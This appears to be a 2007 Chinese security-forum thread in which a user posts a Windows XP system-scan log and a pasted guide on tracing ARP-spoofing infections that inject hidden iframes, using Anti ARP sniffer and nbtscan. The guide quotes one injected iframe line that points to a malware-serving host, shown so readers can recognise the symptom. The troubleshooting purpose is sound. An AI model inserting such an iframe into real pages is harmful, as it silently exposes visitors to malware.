Rising Kaka Security Forum > Technical Exchange > Anti-virus / Anti-rogue-software Forum

ANI virus rampant, cannot browse normally, log experts please take a look [original]

For a while now, as soon as I go online NOD32 reports a trojan. I am posting the relevant traces here; experts, please have a look.
System Repair Engineer 2.4.12.806
Smallfrogs (http://www.KZTechs.com)

Windows XP Professional Service Pack 2 (Build 2600) - administrator account - full functionality

The following items were selected:
    All startup items (registry, startup folder, services, etc.)
    Browser add-ons
    Running processes (including process module information)
    File associations
    Winsock providers
    Autorun.inf
    HOSTS file


Startup items
Registry
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    <ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe>  [(Verified)Microsoft Windows Publisher]
    <PSwitch><C:\Documents and Settings\********.********-C05015\My Documents\bbbb\代理搜索、测试和管理 Proxy Switcher Pro 3.5.3537绿色版\Proxy Switcher Standard\ProxySwitcher.exe>  [N/A]
    <MSMSGS><; "C:\Program Files\Messenger\msmsgs.exe" /background>  [Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <IMJPMIG8.1><"C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32>  [(Verified)Microsoft Windows Publisher]
    <PHIME2002ASync><C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC>  [(Verified)Microsoft Windows Publisher]
    <PHIME2002A><C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName>  [(Verified)Microsoft Windows Publisher]
    <High Definition Audio Property Page Shortcut><HDAShCut.exe>  [(Verified)Microsoft Windows XP Publisher]
    <SKYNET Personal FireWall><C:\Program Files\SkyNet\FireWall\pfw.exe>  [广州众达天网技术有限公司]
    <Antiy Auto Update><C:\Program Files\Antiy Labs\Alive\AliveCenter.exe>  [安天信息技术有限公司]
    <AGB5Monitor><C:\Program Files\Antiy Labs\AGuard\AGuard.exe /AutoRun>  [安天信息技术有限公司]
    <IMSCMig><C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMSC40A\IMSCMIG.EXE /Preload>  [(Verified)Microsoft Corporation]
    <nod32kui><"C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE>  [Eset ]
    <IMEKRMIG6.1><C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE>  [(Verified)Microsoft Windows Publisher]
    <MSPY2002><C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC>  [(Verified)Microsoft Windows Publisher]
    <igfxtray><C:\WINDOWS\system32\igfxtray.exe>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]
    <igfxhkcmd><C:\WINDOWS\system32\hkcmd.exe>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]
    <igfxpers><C:\WINDOWS\system32\igfxpers.exe>  [(Verified)Microsoft Windows Publisher]
    <RTHDCPL><RTHDCPL.EXE>  [(Verified)Microsoft Windows Publisher]
    <StormCodec_Helper><"E:\anzhuang\baofengyingyin\Storm Codec\StormSet.exe" /S /opti>  []
    <AntiArpSniffer><; C:\Program Files\Anti ARP Sniffer\AntiArpSniffer.exe>  []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <shell><Explorer.exe>  [(Verified)Microsoft Windows Publisher]
    <Userinit><C:\WINDOWS\system32\UserInit.exe,>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <AppInit_DLLs><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <UIHost><logonui.exe>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
    <{57B86673-276A-48B2-BAE7-C6DBB3020EB8}><C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll>  [Anti-Malware Development a.s.]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]
    <WinlogonNotify: igfxcui><igfxdev.dll>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]

==================================
Startup folder
[Shortcut to Notshare]
  <C:\Documents and Settings\********.********-C05015\「开始」菜单\程序\启动\快捷方式 到 Notshare.lnk --> D:\基础知识\Notshare.bat [N/A]><N>

==================================
Services
[ASP.NET State Service / aspnet_state][Stopped/Manual Start]
  <C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe><N/A>
[AVG Anti-Spyware Guard / AVG Anti-Spyware Guard][Running/Auto Start]
  <C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe><Anti-Malware Development a.s.>
[Human Interface Device Access / HidServ][Stopped/Disabled]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[NOD32 Kernel Service / NOD32krn][Running/Auto Start]
  <"C:\Program Files\Eset\nod32krn.exe"><Eset>
[Spyware Terminator Clam Service / sp_clamsrv][Stopped/Auto Start]
  <C:\Program Files\WinClamAVShield\sp_clamsrv.exe><N/A>

==================================
Drivers
[AMON / AMON][Running/Auto Start]
  <\??\C:\WINDOWS\system32\drivers\amon.sys><Eset>
[AntiyFirewall / AntiyFirewall][Running/Manual Start]
  <\??\C:\WINDOWS\system32\drivers\AntiyFW.sys><N/A>
[AVG Anti-Spyware Driver / AVG Anti-Spyware Driver][Running/System Start]
  <\??\C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.sys><N/A>
[AVG Anti-Spyware Clean Driver / AvgAsCln][Running/System Start]
  <System32\DRIVERS\AvgAsCln.sys><GRISOFT, s.r.o.>
[Broadcom NetXtreme Gigabit Ethernet / b57w2k][Running/Manual Start]
  <system32\DRIVERS\b57xp32.sys><Broadcom Corporation>
[Microsoft UAA Function Driver for High Definition Audio Service / HdAudAddService][Stopped/Manual Start]
  <system32\drivers\HdAudio.sys><Windows (R) Server 2003 DDK provider>
[Microsoft UAA Bus Driver for High Definition Audio / HDAudBus][Running/Manual Start]
  <system32\DRIVERS\HDAudBus.sys><Windows (R) Server 2003 DDK provider>
[ialm / ialm][Running/Manual Start]
  <system32\DRIVERS\ialmnt5.sys><Intel Corporation>
[imagedrv / imagedrv][Running/Boot Start]
  <\SystemRoot\System32\Drivers\imagedrv.sys><Ahead Software AG>
[imagesrv / imagesrv][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\imagesrv.sys><Ahead Software AG>
[Service for Realtek HD Audio (WDM) / IntcAzAudAddService][Running/Manual Start]
  <system32\drivers\RtkHDAud.sys><Realtek Semiconductor Corp.>
[NetrobocopLowLevelService / NPF][Stopped/Manual Start]
  <\??\C:\DOCUME~1\ANDYLA~1.SHA\LOCALS~1\Temp\nsb\npf.sys><N/A>
[npkcrypt / npkcrypt][Running/Auto Start]
  <\??\C:\Program Files\Tencent\QQ\npkcrypt.sys><INCA Internet Co., Ltd.>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
  <system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[RsAntiSpyware / RsAntiSpyware][Running/Boot Start]
  <\SystemRoot\system32\drivers\RsBoot.sys><Beijing Rising>
[Secdrv / Secdrv][Running/Auto Start]
  <system32\DRIVERS\secdrv.sys><Macrovision Europe Ltd>
[USB Filter Driver / ser2pl][Stopped/Manual Start]
  <system32\DRIVERS\ser2pl.sys><Prolific Technology Inc.>
[StarForce Protection Environment Driver (version 1.x.a) / sfdrv01a][Running/Boot Start]
  <\SystemRoot\System32\drivers\sfdrv01a.sys><Protection Technology (StarForce)>
[StarForce Protection Helper Driver (version 2.x) / sfhlp02][Running/Boot Start]
  <\SystemRoot\System32\drivers\sfhlp02.sys><Protection Technology (StarForce)>
[StarForce Protection Synchronization Driver (version 4.x) / sfsync04][Running/Boot Start]
  <\SystemRoot\System32\drivers\sfsync04.sys><Protection Technology (StarForce)>
[SKNFW / SKNFW][Running/System Start]
  <\??\C:\WINDOWS\system32\Drivers\SKNFW.sys><N/A>
[SkyProcs / SkyProcs][Running/Manual Start]
  <\??\C:\Program Files\SkyNet\FireWall\SkyProcs.sys><N/A>
[Sony USB Filter Driver (SONYPVU1) / SONYPVU1][Stopped/Manual Start]
  <system32\DRIVERS\SONYPVU1.SYS><Sony Corporation>
[XScanPF / XScanPF][Stopped/Manual Start]
  <\??\C:\Documents and Settings\********.********-C05015\桌面\X-Scan-v3.3-cn\X-Scan-v3.3\dat\xpf.sys><N/A>
Last edited 2007-06-22 16:32:50

For details see:
http://www.data10000.com/Article/systemsafety/virus/200706/29834.html

The most effective way to deal with the hyap98 virus (how to handle the hyap98.com, zpx520.com and similar ANI viruses)

Symptoms:
Web pages do not display properly. Open IE -> View -> Source and you find a line like this (or similar):
<iframe src='http://www.hyap98.com/123/ad.htm' height='0'></iframe>

So the machine seems infected. You scan the entire hard disk with the latest antivirus (plus trojan removal tools), it really does find quite a few viruses, and now things should be fine. You try going online again and the problem comes right back; you scan again, and this time nothing is found. What is going on?

Cause:
In fact there is no longer any virus on the computer you are using. The infected machine is another computer on your LAN, which has the ARP virus (ARP spoofing). That infected computer keeps sending the virus to your computer.

Steps:
Step 1. Download the two programs Anti arp sniffer (http://www.data10000.com/Soft/200706/4.html) and nbtscan (http://www.data10000.com/Soft/200706/5.html). These two tools let you find the source of the infection with ease.

Step 2. Find the infected computer.
Run Anti arp sniffer; some of what it shows may not be clear, which is where nbtscan comes in. Click Start -> Run, type command and press OK; a DOS window appears. At the DOS prompt type: d:\nbtscan\nbtscan -r 192.168.1.1/24
(This assumes the computer you are on has IP address 192.168.1.18, the gateway is 192.168.1.1, all LAN addresses fall within 192.168.1.1~254, and nbtscan is stored in the d:\nbtscan directory.)

Step 3. Enter the corresponding data into Anti arp sniffer and click Get gateway MAC address -> Auto protect -> Protect against address conflict. Before long the small Anti arp sniffer window shows "Attacker MAC address: 00-e0-a0-0b-87-ca" and an ARP spoofing alert also appears at the lower right. In the DOS window, find the matching entry: IP address 192.168.1.134, a computer named "MING" (if the alert has not appeared yet, try browsing with IE and the packet shows up immediately). The problem computer has now been found.
Use the latest antivirus and anti-trojan/anti-rogue-software tools (e.g. 360 Safeguard, http://www.360safe.com) to remove the viruses, trojans and rogue software from the problem computer (by the way, scanning is best done in Safe Mode (press F8 at boot), ...

Browser add-ons
[Adobe PDF Reader Link Helper]
  {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[Yahoo! IE Services Button]
  {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} <C:\Program Files\Yahoo!\Common\yiesrvc.dll, Yahoo! Inc.>
[BLin IeDoor Class]
  {A7934164-66CE-4B01-AD28-A42F734E448D} <C:\Documents and Settings\********.********-C05015\blin\blinplug.dll, BLin Inc.>
[浩方对战平台]
  {0A155D3C-68E2-4215-A47A-E800A446447A} <E:\anzhuang\HAOFANG\浩方对战平台\GameClient.exe, 上海浩方在线信息技术有限公司>
[Yahoo! IE Services Button]
  {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} <C:\Program Files\Yahoo!\Common\yiesrvc.dll, Yahoo! Inc.>
[信息检索(&R)]
  {92780B25-18CC-41C8-B9BE-3C9C571A8263} <C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL, Microsoft Corporation>
[Messenger]
  {FB5F1910-F110-11d2-BB9E-00C04F795683} <C:\Program Files\Messenger\msmsgs.exe, Microsoft Corporation>
[访问瑞星网站]
  {FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E444} <http://www.rising.com.cn/?u=RSTB, N/A>
[访问卡卡社区]
  {FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E445} <http://www.ikaka.com/?u=RSTB, N/A>
[BitComet工具栏]
  {3F1ABCDB-A875-46c1-8345-B72A4567E486} <C:\Program Files\BitComet\BitCometBar\BitCometBar0.6.dll, >
[卡卡上网安全助手]
  {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} <C:\WINDOWS\system32\KakaTool.dll, Beijing Rising Technology Co., Ltd.>
[YInstStarter Class]
  {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} <C:\Program Files\Yahoo!\Common\yinsthelper.dll, Yahoo! Inc.>
[WUWebControl Class]
  {6414512B-B978-451D-A0D8-FCFDF33E833C} <C:\WINDOWS\system32\wuweb.dll, Microsoft Corporation>
[Filetran Control]
  {88734439-46D0-42C0-A13F-7E881EE550CF} <C:\WINDOWS\DOWNLO~1\filetran.ocx, Bluesky Studio(http://www.bluesky.cn)>
[Netease Chat Control]
  {C37FBD87-3AA7-4640-9A8D-19AFC10B15B2} <C:\WINDOWS\DOWNLO~1\chat.ocx, Netease>
[Shockwave Flash Object]
  {D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx, Adobe Systems, Inc.>
[Yahoo! Toolbar Helper]
  {02478D38-C3F9-4EFB-9B51-7695ECA05670} <, N/A>
[Adobe PDF Reader Link Helper]
  {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[PeerDraw Class]
  {10072CEC-8CC1-11D1-986E-00A0C955B42E} <C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll, Microsoft Corporation>
[Windows Media Player]
  {22D6F312-B0F6-11D0-94AB-0080C74C7E95} <C:\WINDOWS\system32\wmpdxm.dll, Microsoft Corporation>
[HTML Document]
  {25336920-03F9-11CF-8FD0-00AA00686F13} <%SystemRoot%\system32\mshtml.dll, N/A>
[DHTML Edit Control Safe for Scripting for IE5]
  {2D360201-FFF5-11D1-8D03-00A0C959BC0A} <C:\Program Files\Common Files\Microsoft Shared\Triedit\dhtmled.ocx, Microsoft Corporation>
[HtmlDlgSafeHelper Class]
  {3050F819-98B5-11CF-BB82-00AA00BDCE0B} <C:\WINDOWS\system32\mshtmled.dll, Microsoft Corporation>
[IETag Factory]
  {38481807-CA0E-42D2-BF39-B33AF135CC4D} <C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\IETAG.DLL, Microsoft Corporation>
[BitComet工具栏]
  {3F1ABCDB-A875-46C1-8345-B72A4567E486} <C:\Program Files\BitComet\BitCometBar\BitCometBar0.6.dll, >
[HHCtrl Object]
  {52A2AAAE-085D-4187-97EA-8C30DB990436} <C:\WINDOWS\system32\hhctrl.ocx, Microsoft Corporation>
[Shell Name Space]
  {55136805-B2DE-11D1-B9F2-00A0C98BC547} <%SystemRoot%\system32\shdocvw.dll, N/A>
[Yahoo! IE Services Button]
  {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} <C:\Program Files\Yahoo!\Common\yiesrvc.dll, Yahoo! Inc.>
[WUWebControl Class]
  {6414512B-B978-451D-A0D8-FCFDF33E833C} <C:\WINDOWS\system32\wuweb.dll, Microsoft Corporation>
[Windows Media Player]
  {6BF52A52-394A-11D3-B153-00C04F79FAA6} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[Microsoft Web 浏览器]
  {8856F961-340A-11D0-A96B-00C04FD705A2} <C:\WINDOWS\system32\shdocvw.dll, Microsoft Corporation>
[Filetran Control]
  {88734439-46D0-42C0-A13F-7E881EE550CF} <C:\WINDOWS\DOWNLO~1\filetran.ocx, Bluesky Studio(http://www.bluesky.cn)>
[BLin IeDoor Class]
  {A7934164-66CE-4B01-AD28-A42F734E448D} <C:\Documents and Settings\********.********-C05015\blin\blinplug.dll, BLin Inc.>
[RMGetLicense Class]
  {A9FC132B-096D-460B-B7D5-1DB0FAE0C062} <C:\WINDOWS\system32\msnetobj.dll, Microsoft Corporation>
[Qzone Media Tools]
  {AC3A36A8-9BFF-410A-A33D-2279FFEB69D2} <E:\anzhuang\qq\VQQPLA~1.OCX, Tencent Technology (Shenzhen) Company Limited>
[Microsoft Scriptlet Component]
  {AE24FDAE-03C6-11D1-8B76-0080C744F389} <C:\WINDOWS\system32\mshtml.dll, Microsoft Corporation>
[SearchAssistantOC]
  {B45FF030-4447-11D2-85DE-00C04FA35C89} <%SystemRoot%\system32\shdocvw.dll, N/A>
[RDS.DataSpace]
  {BD96C556-65A3-11D0-983A-00C04FC29E36} <C:\Program Files\Common Files\System\msadc\msadco.dll, Microsoft Corporation>
[Netease Chat Control]
  {C37FBD87-3AA7-4640-9A8D-19AFC10B15B2} <C:\WINDOWS\DOWNLO~1\chat.ocx, Netease>
[AUDIO__MP3 Moniker Class]
  {CD3AFA76-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[AUDIO__X_MS_WMA Moniker Class]
  {CD3AFA84-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[VIDEO__X_MS_WMV Moniker Class]
  {CD3AFA94-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[RealPlayer G2 Control]
  {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA} <C:\WINDOWS\system32\rmoc3260.dll, RealNetworks, Inc.>
[Shockwave Flash Object]
  {D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx, Adobe Systems, Inc.>
[GetInfo Class]
  {D5184A39-CBDF-4A4F-AC1A-7A45A852C883} <C:\PROGRA~1\Yahoo!\Common\yverinfo.dll, Yahoo! Inc.>
[卡卡上网安全助手]
  {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} <C:\WINDOWS\system32\KakaTool.dll, Beijing Rising Technology Co., Ltd.>
[Yahoo! Toolbar]
  {EF99BD32-C1FB-11D2-892F-0090271D4F88} <, N/A>
[&使用比邻下载(&B)]
  <C:\Documents and Settings\********.********-C05015\blin\ctxmenu.htm, N/A>
[&使用迅雷下载]
  <C:\anzhuang\xunlei\Program\geturl.htm, N/A>
[&使用迅雷下载全部链接]
  <C:\anzhuang\xunlei\Program\getallurl.htm, N/A>
[Yahoo! &Dictionary]
  <file:///C:\Program Files\Yahoo!\Common/ycdict.htm, N/A>
[Yahoo! &Maps]
  <file:///C:\Program Files\Yahoo!\Common/ycmap.htm, N/A>
[Yahoo! &SMS]
  <file:///C:\Program Files\Yahoo!\Common/ycsms.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
  <res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
[添加到QQ表情]
  <E:\anzhuang\qq\AddEmotion.htm, N/A>
[火狐Flash保存]
  <E:\anzhuang\flash\FoxFlashplayer\PlugIns\GetFlash.htm, N/A>

Running processes
[PID: 664][\SystemRoot\System32\smss.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 728][\??\C:\WINDOWS\system32\csrss.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 752][\??\C:\WINDOWS\system32\winlogon.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\igfxdev.dll]  [Intel Corporation, 3.0.0.4421]
[PID: 796][C:\WINDOWS\system32\services.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 808][C:\WINDOWS\system32\lsass.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
[PID: 964][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1040][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
[PID: 1132][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
[PID: 3908][C:\WINDOWS\Explorer.EXE]  [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\PDFShell.dll]  [Adobe Systems, Inc., 7.0.0.0]
    [C:\WINDOWS\system32\igfxsrvc.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxpph.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\hccutils.DLL]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxres.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxress.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\msdmo.dll]  [, ]
    [C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll]  [Anti-Malware Development a.s., 7, 5, 0, 47]
    [C:\Program Files\Antiy Labs\AGB5Cn\AGBCM.dll]  [Antiy Labs, 3, 0, 0, 0]
    [C:\PROGRA~1\Yahoo!\Common\ymmapi.dll]  [Yahoo! Inc., 2005, 1, 1, 4]
    [C:\Program Files\WinRAR\rarext.dll]  [N/A, ]
    [C:\Program Files\Eset\nodshex.dll]  [N/A, ]
    [C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\context.dll]  [Anti-Malware Development a.s., 7, 5, 0, 49]
    [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll]  [Adobe Systems Incorporated, 7.0.9.2006121800]
    [C:\WINDOWS\system32\MSVCR71.dll]  [Microsoft Corporation, 7.10.3052.4]
    [C:\Program Files\Microsoft Office\OFFICE11\msohev.dll]  [Microsoft Corporation, 11.0.5510]
[PID: 704][C:\Program Files\Eset\nod32kui.exe]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\nod32rui.dll]  [N/A, ]
    [C:\Program Files\Eset\pu_amon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_amon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pu_dmon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_dmon.dll]  [N/A, ]
    [C:\Program Files\Eset\pu_emon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_emon.dll]  [N/A, ]
    [C:\Program Files\Eset\pu_imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
    [C:\Program Files\Eset\pu_nod32.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_nod32.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pu_upd.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_upd.dll]  [N/A, ]
[PID: 2096][C:\WINDOWS\system32\igfxtray.exe]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\hccutils.DLL]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxsrvc.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxres.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxress.dll]  [Intel Corporation, 3.0.0.4421]
[PID: 2236][C:\WINDOWS\system32\hkcmd.exe]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\hccutils.DLL]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxsrvc.dll]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxres.dll]  [Intel Corporation, 3.0.0.4421]
[PID: 2092][C:\WINDOWS\system32\igfxpers.exe]  [Intel Corporation, 3.0.0.4421]
    [C:\WINDOWS\system32\igfxsrvc.dll]  [Intel Corporation, 3.0.0.4421]
[PID: 2632][C:\Program Files\Antiy Labs\Alive\AliveCenter_.exe]  [安天信息技术有限公司, 2, 1, 4, 0]
[PID: 2660][C:\Program Files\Antiy Labs\AGuard\AGuard_.exe]  [安天信息技术有限公司, 2, 4, 6, 0]
    [C:\Program Files\Common Files\Antiy Labs\Base\AVLeachSDK.dll]  [Antiy Labs, 2, 0, 3, 0]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\AExploit.dll]  [, 1, 0, 0, 1]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\APack.dll]  [Antiy Labs, 1, 0, 1, 1]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\APk.dll]  [Antiy Labs, 1, 0, 2, 3]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\ARealPop.dll]  [N/A, ]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\ATrojan.dll]  [Antiy Labs, 1, 0, 14, 0]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\KillTrojan.dll]  [Antiy Labs, 1, 0, 0, 3]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\MiscFix.dll]  [Antiy Labs, 1, 0, 1, 0]
    [C:\Program Files\Common Files\Antiy Labs\Base\Module\ScanReg.dll]  [, 1, 0, 0, 4]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
[PID: 2768][C:\WINDOWS\RTHDCPL.EXE]  [Realtek Semiconductor Corp., 2.0.6.4]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 2808][C:\WINDOWS\system32\ctfmon.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2816][C:\WINDOWS\system32\conime.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 3520][C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe]  [Anti-Malware Development a.s., 7, 5, 0, 50]
    [C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\engine.dll]  [Anti-Malware Development a.s., 4, 2, 0, 15]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
[PID: 476][C:\Program Files\Internet Explorer\IEXPLORE.EXE]  [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll]  [Adobe Systems Incorporated, 7.0.9.2006121800]
    [C:\WINDOWS\system32\MSVCR71.dll]  [Microsoft Corporation, 7.10.3052.4]
    [C:\Program Files\Yahoo!\Common\yiesrvc.dll]  [Yahoo! Inc., 2006, 10, 31, 3]
    [C:\Program Files\Yahoo!\Common\YIeTagBm.dll]  [Yahoo! Inc., 2006, 7, 28, 1]
    [C:\Documents and Settings\********.********-C05015\blin\blinplug.dll]  [BLin Inc., 0, 7, 3, 18]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
    [C:\Program Files\Microsoft Office\OFFICE11\msohev.dll]  [Microsoft Corporation, 11.0.5510]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx]  [Adobe Systems, Inc., 9,0,28,0]
    [C:\Program Files\Yahoo!\Common\yloginids.dll]  [Yahoo!, 2005, 8, 17, 1]
    [C:\WINDOWS\system32\xpsp3res.dll]  [Microsoft Corporation, 5.1.2600.3121 (xpsp_sp2_gdr.070418-0032)]
[PID: 3052][C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE]  [Microsoft Corporation, 11.0.5604]
    [C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll]  [Microsoft Corporation, 11.0.6360]
    [C:\Program Files\Common Files\Microsoft Shared\office11\riched20.dll]  [Microsoft Corporation, 5.50.99.2009]
    [C:\Program Files\Eset\Dmon.dll]  [Eset , 2, 51, 26 ]
    [C:\PROGRA~1\MICROS~2\OFFICE11\ADDINS\SYMINPUT.DLL]  [Microsoft Corporation, 1.02]
    [C:\WINDOWS\system32\MSVBVM60.DLL]  [Microsoft Corporation, 6.00.9690]
    [C:\WINDOWS\system32\VB6CHS.DLL]  [Microsoft Corporation, 6.00.8988]
    [C:\Program Files\Common Files\Kingsoft\Extract\PWOffice2.dll]  [Kingsoft Co, Ltd., 8, 5, 1, 0]
    [C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL]  [Microsoft Corporation, 1.1.6215]
    [C:\Program Files\Common Files\Microsoft Shared\PROOF\mslid.dll]  [Microsoft Corporation, 1.0.2305]
    [C:\Program Files\Common Files\Microsoft Shared\PROOF\2052\MSGR3EN.DLL]  [Microsoft Corporation, 3.1.2303]
